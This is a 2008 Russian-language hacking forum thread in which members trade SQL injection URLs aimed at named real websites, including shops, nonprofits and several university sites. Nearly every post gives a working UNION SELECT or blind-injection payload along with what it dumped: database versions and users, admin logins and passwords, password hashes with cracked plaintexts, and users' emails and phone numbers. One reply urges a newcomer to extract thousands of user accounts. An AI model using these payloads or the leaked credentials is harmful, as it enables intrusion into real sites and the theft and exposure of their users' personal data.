08.06.2008, 23:08
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
С нами:
10242288
Репутация:
536
|
|
torg.ua
Код:
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=1/*
Код:
http://www.torg.ua/board_podrobno.php?details=2261+AND+1=2/*
Смотрите разницу  . Инъекция вывода не имеет, но можно посимвольно брутить, сбрутил версию:
-> Try 30 .. 70 -> Char > 50
-> Try 50 .. 70 -> Char < 60
-> Try 50 .. 61 -> Char < 55
-> Try 50 .. 56 -> Char < 53
-> Try 50 -> NO =(
-> Try 51 -> NO =(
-> Try 52 -> FOUND!
-> Ascii: 52
-> Char: 4
Ничего хорошего, четверка 
|
|
|
08.06.2008, 23:14
|
|
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
С нами:
9847919
Репутация:
1446
|
|
tribeca.org
Код:
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/*
5.0.24a-standard-log�tribeca_user@apache2-blow.skoda.dreamhost.com�tribecaorgnew
Код:
http://www.tribeca.org/content.php?id=-2'+union+select+1,concat(admin,0x3,admin_pass),3,4,5,6,7,8+from+site_admin/*
admin�admin
mogadishni.com
Код:
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,version(),user(),database()),2,3,4,5/*
4.1.20-community-nt�chr@localhost�mogadishni
Код:
http://www.mogadishni.com/site/artist.php?id=-2+union+select+concat_ws(0x3,id,email,phone),2,3,4,5+from+contact+limit+2,1/*
4�loeland@mogadishni.com�+45 32543535
|
|
|
|
09.06.2008, 00:37
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
rfbd.ru - Телефонные Базы Данных г. Москва, Телефонные Справочники г. Москва, Паспортные Базы Данных г. Москва
http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase())/*
5.0.37-standard-log:a1rfbd_guest@localhost:a1rfbd_ric_datebase
http://rfbd.ru/info.php?id=402&rubrika=-1+union+select+1,table_name+from+information_schem a.columns+where+column_name=0x70617373776f7264/*
_cms_users
СоюзКредит.ру — быстрый денежный кредит, ипотека и автокредит
http://www.souscredit.ru/?p=4&cat=-1+union+select+1,concat_ws(0x3a,name,login,pass,ma il),3,4+from+users+where+id=1/*
admin:llirik:kirill:admin@souscredit.ru
Последний раз редактировалось ~!DoK_tOR!~; 09.06.2008 в 02:02..
|
|
|
|
09.06.2008, 02:14
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами:
10282956
Репутация:
380
|
|
На сладенькое немного .edu
Код:
http://www.ub.edu/crai/pharmakoteka/registre.php?id=-11+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.cpd.usu.edu/asset.php?id=-111+UNION+SELECT+1,table_name,table_name,table_name,5,6+from+information_schema.tables+limit+15,1/*
http://caxton.emich.edu/guide/guide.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8,9/*
http://math.ucsd.edu/people/profile.php?id=-111+UNION+SELECT+VERSION()/*
http://www.stots.edu/article.php?id=-111+UNION+SELECT+1,2,VERSION(),4,5,6,7,8/*
|
|
|
|
09.06.2008, 13:06
|
|
Новичок
Регистрация: 11.05.2008
Сообщений: 12
С нами:
9473814
Репутация:
5
|
|
http://www.whitleyaward.org/display.php?id=-75+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13, 14,15,16,17 ,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33/
*
http://www.comicstriplibrary.org/display.php?id=-606+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,14,1 5,16,17,18,19/*
http://www.heroplay.com/features/articles/display.php?id=-27+union+select+1,2,3,version(),5,6,7,8,9,10 ,11,12,13,14 ,15,16,17 ,18,19,20,21/*
http://www.isdci.org/display.php?ID=-36+union+select+1,2 ,v ersi on(),4,5,6/*
http://www.noborder.org/actionday2005/display.php?id=-334+union+select+1,2,version(),4,5,6,7,8,9 ,10,11,12 ,13,14,1 5,16,17,18,19,20,21,2 2,23,24,25,26,27/*
|
|
|
|
09.06.2008, 14:55
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
http://www.cageprisoners.com/page.php?id=-3+union+select+1,2,concat_ws(0x3a,id,username,pass word,email,level,last_login)+from+admins+limit+0,1/*
5.0.22
admin:NZnlqRHG2GH8RHmHnShvb/
но так как такого хеша , по моему, нету поэтому вот вариации хешей всех админов при добавке $1$$ или $apr1$$ md5(Unix) или md5(APR) соответственно
$1$$M3TkIDtI14ob4MPCg42FO1
$1$$lw5UAzT2SsIuEfwZqZ45Z1
$1$$1xIcgmF403/oVi4lWT/mp/
$1$$MY4aW1u.6HE0oCMmBPGbS0
$1$$LhrLb2O5uxhivwYrDPGSj1
$1$$Eg92rdb3Ur7jmxG/Ip5na/
$1$$lEiUe5NQPjWHfblYeq8np/
$1$$eoqd8CPMgb77qCBgf4hA2/
$1$$NZnlqRHG2GH8RHmHnShvb/
$apr1$$M3TkIDtI14ob4MPCg42FO1
$apr1$$lw5UAzT2SsIuEfwZqZ45Z1
$apr1$$1xIcgmF403/oVi4lWT/mp/
$apr1$$MY4aW1u.6HE0oCMmBPGbS0
$apr1$$LhrLb2O5uxhivwYrDPGSj1
$apr1$$Eg92rdb3Ur7jmxG/Ip5na/
$apr1$$lEiUe5NQPjWHfblYeq8np/
$apr1$$eoqd8CPMgb77qCBgf4hA2/
$apr1$$NZnlqRHG2GH8RHmHnShvb/
|
|
|
|
09.06.2008, 17:22
|
|
Участник форума
Регистрация: 15.05.2008
Сообщений: 166
С нами:
9467906
Репутация:
128
|
|
http://www.hardvision.ru
Сама уязвимость:
Код:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*
Код HTML:
login: foto
database: hardvision
version:5.0.45-5-log
Мой первый пост на форуме =)
|
|
|
|
09.06.2008, 19:26
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
С нами:
9799586
Репутация:
1385
|
|
Сообщение от fatalo
http://www.hardvision.ru
Сама уязвимость:
Код:
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,user(),3/*
Код HTML:
login: foto
database: hardvision
version:5.0.45-5-log
Мой первый пост на форуме =)
хоть и твой первый пост .. но ты должен помнить ! что скулю надо раскручивать если есть такая возможность ! (5ая версия так что тут даже думать нечего !)
================================================== ============
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,username,passwor d),3+from+hvbb.user+limit+6111,1/*
6к юзеров от булки - md5(md5($pass).$salt)
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passwd),3+f rom+foto.admin_table/*
digit:30bf4fb4729f382ca2010fd445f1796d:mityap123
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,nick,passw,kode) ,3+from+foto.users+limit+0,1/*
юзерские логины-пароли от сервиса www.getfoto.ru
http://www.hardvision.ru/index.php3?to=files&action=showCateg&cid=-233+union+select+1,concat_ws(0x3a,username,passwor d),3+from+hardvision.adrobot_affiliates/*
hardvision:0b1f34d5c98ace48972bf71ccb6d5218:mityap13
|
|
|
|
09.06.2008, 19:54
|
|
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами:
9633635
Репутация:
338
|
|
Код:
http://toyota-opa.ru/articles.php?m=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
5.0.45/opa/root@localhost
Код:
http://www.vitz.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
5.0.45/vitz_2/root@localhost
Код:
http://www.raum.ru/articles.php?m=opit&type=-1'%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8/*
5.0.45/vitz/root@localhost |
|
|
|
09.06.2008, 21:07
|
|
Познающий
Регистрация: 23.04.2008
Сообщений: 39
С нами:
9499716
Репутация:
135
|
|
mobilka.com.ua
mobilka.com.ua
_http://mobilka.com.ua/melodies/download.php?id=-3206+union+select+1,version(),3,4,5,6--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
